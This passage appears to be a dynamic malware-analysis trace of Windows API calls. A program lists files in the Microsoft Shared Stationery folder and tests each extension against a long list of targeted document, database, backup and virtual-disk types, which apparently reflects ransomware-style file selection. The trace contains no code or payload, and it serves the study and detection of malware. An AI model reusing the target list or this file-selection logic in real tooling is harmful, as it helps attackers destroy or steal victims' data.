(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.042] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.042] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Month_Calendar.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" [0040.042] PathFindExtensionW (pszPath="Month_Calendar.emf") returned=".emf" [0040.042] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.042] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.042] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.042] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Music.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" [0040.042] PathFindExtensionW (pszPath="Music.emf") returned=".emf" [0040.042] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.042] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.042] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.042] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Notebook.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" [0040.042] PathFindExtensionW (pszPath="Notebook.jpg") returned=".jpg" [0040.042] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.042] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.042] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.042] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Orange Circles.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" [0040.042] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0040.043] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.043] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.043] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.043] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="OrangeCircles.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" [0040.043] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0040.043] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.043] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.043] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.043] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Peacock.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" [0040.043] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0040.043] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.043] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.043] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.043] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Peacock.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" [0040.043] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0040.043] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.043] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.043] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.044] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Pine_Lumber.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" [0040.044] PathFindExtensionW (pszPath="Pine_Lumber.jpg") returned=".jpg" [0040.044] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.044] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.044] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.044] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Pretty_Peacock.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" [0040.044] PathFindExtensionW (pszPath="Pretty_Peacock.jpg") returned=".jpg" [0040.044] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.044] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.044] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.044] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Psychedelic.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" [0040.044] PathFindExtensionW (pszPath="Psychedelic.jpg") returned=".jpg" [0040.044] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.044] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.044] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.044] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Roses.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" [0040.044] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0040.044] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.044] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.045] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.045] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Roses.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" [0040.045] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0040.045] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.045] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.045] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.045] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Sand_Paper.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" [0040.045] PathFindExtensionW (pszPath="Sand_Paper.jpg") returned=".jpg" [0040.045] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.045] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.045] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.045] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Seyes.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" [0040.045] PathFindExtensionW (pszPath="Seyes.emf") returned=".emf" [0040.045] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.045] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.045] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.045] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Shades of Blue.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" [0040.045] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0040.046] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.046] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.046] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.046] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="ShadesOfBlue.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" [0040.046] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0040.046] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.046] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.046] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.046] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Shorthand.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" [0040.046] PathFindExtensionW (pszPath="Shorthand.emf") returned=".emf" [0040.046] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.046] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.046] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.046] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Small_News.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" [0040.046] PathFindExtensionW (pszPath="Small_News.jpg") returned=".jpg" [0040.046] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.046] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.047] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.047] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Soft Blue.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" [0040.047] PathFindExtensionW (pszPath="Soft Blue.htm") returned=".htm" [0040.047] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.047] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.047] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.047] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="SoftBlue.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" [0040.047] PathFindExtensionW (pszPath="SoftBlue.jpg") returned=".jpg" [0040.047] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.047] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.047] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.047] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Stars.htm" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" [0040.047] PathFindExtensionW (pszPath="Stars.htm") returned=".htm" [0040.047] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".htm.") returned 5 [0040.047] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".htm.") returned 0x0 [0040.047] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.047] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Stars.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" [0040.048] PathFindExtensionW (pszPath="Stars.jpg") returned=".jpg" [0040.048] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.048] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.048] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.048] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Stucco.gif" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" [0040.048] PathFindExtensionW (pszPath="Stucco.gif") returned=".gif" [0040.048] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".gif.") returned 5 [0040.048] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".gif.") returned 0x0 [0040.048] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.048] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Tanspecks.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" [0040.048] PathFindExtensionW (pszPath="Tanspecks.jpg") returned=".jpg" [0040.048] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.048] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.048] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.048] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common 